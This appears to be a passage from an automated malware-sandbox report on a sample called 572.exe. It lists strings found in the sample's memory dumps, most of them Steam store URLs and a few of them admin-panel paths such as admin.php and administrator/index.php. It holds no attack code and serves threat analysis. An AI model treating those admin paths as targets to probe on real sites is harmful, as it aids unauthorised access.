                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/?snr=1_4_4__join
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/?snr=1_4_4__login
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/?snr=1_4_4__global-header
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/account/cookiepreferences/?snr=1_44_44_
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/admin.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/admin.phpo-?
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/administrator/
                Source: 572.exe, 00000009.00000003.4523052924.000000004E0B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1057090/Ori_and_the_Will_of_the_Wisps/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1091500/Cyberpunk_2077/?snr=1_4_4__tab-TopGrossing
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1131620/Dominion/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1144200/Ready_or_Not/?snr=1_4_4__tab-TopGrossing
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1201540/HELLCARD/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1243830/Overcooked_All_You_Can_Eat/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1295630/Helskate/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1323830/Shanghai_Summer/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1329360/Lords_of_Exile/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1469610?snr=1_4_4__40_2
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1479810/Legendary_Hoplite/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1493640/Banishers_Ghosts_of_New_Eden/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1544020/The_Callisto_Protocol/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1562430/DREDGE/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1562430?snr=1_4_4__40_2
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1573590/Colonize/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1578650/Citizen_Sleeper/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1578650?snr=1_4_4__40_1
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1604030/V_Rising/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1621690/Core_Keeper/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1649950/News_Tower/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1662210/Arms_Trade_Tycoon_Tanks/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1675200/Steam_Deck/?utm_source=steamhome&snr=1_4_4__147
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1675200/Steam_Deck/?utm_source=steamhomeleftrail&snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1675200/Steam_Deck/?utm_source=steamhometop&snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1693980/Dead_Space/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1746860/The_Elder_Scrolls_V_Skyrim_Anniversary_Upgrade/?snr=1_4_4
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/rogue_like_rogue_lite/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/rpg/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/rpg_action/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/rpg_jrpg/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/rpg_party_based/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/rpg_strategy_tactics/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/rpg_turn_based/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/science_fiction/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/shmup/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sim_building_automation/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sim_dating/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sim_farming_crafting/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sim_hobby_sim/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sim_life/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sim_physics_sandbox/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sim_space_flight/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/simulation/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/singleplayer/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/space/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sports/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sports_and_racing/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sports_fishing_hunting/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sports_individual/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sports_sim/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sports_team/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/story_rich/?snr=1_4_4__12
